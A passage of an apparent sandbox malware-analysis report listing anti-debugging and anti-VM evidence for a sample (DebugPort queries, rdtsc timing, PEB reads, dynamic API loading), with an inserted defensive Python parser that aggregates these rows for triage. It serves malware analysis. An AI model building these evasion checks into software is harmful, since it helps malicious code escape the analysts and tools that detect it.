Source: explorer.exe, 00000004.00000000.368886619.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00409A80 rdtsc
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_0040ACC0 LdrLoadDll,
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,
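Added example (not part of this report): the "Code function" rows record one row per matching instruction, so a function that reads the PEB several times appears several times, and what matters for triage is the number of distinct functions and processes behind each technique. This parser splits each fused "Source: <process><signature>: <detail>" row, groups hits by process and by the technique they imply (a read through fs:[30h] fetches the 32-bit PEB pointer from the TEB, which exposes BeingDebugged, NtGlobalFlag and the Ldr module list; rdtsc deltas detect single-stepping and slow emulation; "Process queried: DebugPort" is the ProcessDebugPort class of NtQueryInformationProcess; LdrLoadDll and GetProcAddress resolve APIs at run time), and keeps only distinct function addresses. It also downgrades the VMware and Hyper-V strings found in explorer.exe memory, because those describe the analysis machine's own devices and are present in explorer.exe whether or not the sample looked at them. The sample rows are copied from this report; the rule names and function names are the example's own.

```python
"""Aggregate the anti-analysis rows of a sandbox report into distinct checks per process."""
import re

LINE_RE = re.compile(
    r"^Source: (?P<src>.+?)"
    r"(?P<sig>Code function|Process queried|Binary or memory string): (?P<detail>.*)$"
)
RULES = (
    ("peb_access", re.compile(r"fs:\[00000030h\]")),            # TEB+0x30 -> PEB (32-bit)
    ("rdtsc_timing", re.compile(r"\brdtsc\b")),
    ("dynamic_api_resolution", re.compile(r"\b(LdrLoadDll|GetProcAddress)\b")),
)
VM_RE = re.compile(r"vmware|vbox|virtualbox|hyper-v|qemu|xen", re.I)
HOST_PROCESSES = {"explorer.exe"}   # pre-existing processes whose memory mirrors the VM's devices


def parse_line(line: str):
    """Split a fused report row into (source, signature, detail); None if it is not one."""
    m = LINE_RE.match(line.strip())
    return (m.group("src"), m.group("sig"), m.group("detail")) if m else None


def summarize(lines):
    """Return {process: {technique: set(distinct evidence)}}."""
    summary = {}
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        src, sig, detail = parsed
        if sig == "Code function":
            func, _, body = detail.partition(" ")      # "3_2_00A84AEF mov eax, dword ptr fs:[...]"
            for technique, rx in RULES:
                if rx.search(body):
                    summary.setdefault(src, {}).setdefault(technique, set()).add(func)
        elif sig == "Process queried" and detail == "DebugPort":
            # ProcessDebugPort information class of NtQueryInformationProcess
            summary.setdefault(src, {}).setdefault("debugport_query", set()).add(detail)
        elif sig == "Binary or memory string" and VM_RE.search(detail):
            proc = src.split(",")[0].strip()           # "explorer.exe, 00000004....sdmp"
            technique = "vm_strings_weak" if proc.lower() in HOST_PROCESSES else "vm_strings"
            summary.setdefault(proc, {}).setdefault(technique, set()).add(detail)
    return summary


def distinct_counts(summary):
    """Collapse the evidence sets to counts of distinct functions/strings."""
    return {proc: {t: len(ev) for t, ev in techs.items()} for proc, techs in summary.items()}


# Rows copied from this report (a subset); the repeated 3_2_00A84AEF row is deliberate.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00409A80 rdtsc
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0040ACC0 LdrLoadDll,
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
Source: explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
""".strip().splitlines()

if __name__ == "__main__":
    for proc, techs in distinct_counts(summarize(SAMPLE_ROWS)).items():
        print(proc, techs)
```

The function identifier keeps its "<n>_<m>_" prefix, so the same image observed as two analysis processes (2_2_... and 3_2_... above) stays distinguishable inside one process bucket. PEB reads are also a normal compiler and runtime idiom, so the peb_access count is a lead to follow in the unpacked code, not proof of a debugger check on its own; the rdtsc and DebugPort rows are the stronger evidence.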
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A090AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009C9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009FF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009FF0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A43884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009C58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EB8E4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009C40E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A47016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A94015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009E0050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A82073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A91074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A469A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009FA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F61A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A541E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009CB1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009C9100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009E4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EB944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009CB171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009CC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009FD294 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009DAAB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009FFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h] (14 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009E3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009CAA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A04A2C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009C5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009D8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A8AA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A7B260 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A98A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A0927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A54257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A8EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A95BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009FB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009D1B8F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F138B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A8138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A7D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A723E3 mov ecx, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A723E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A453CA mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
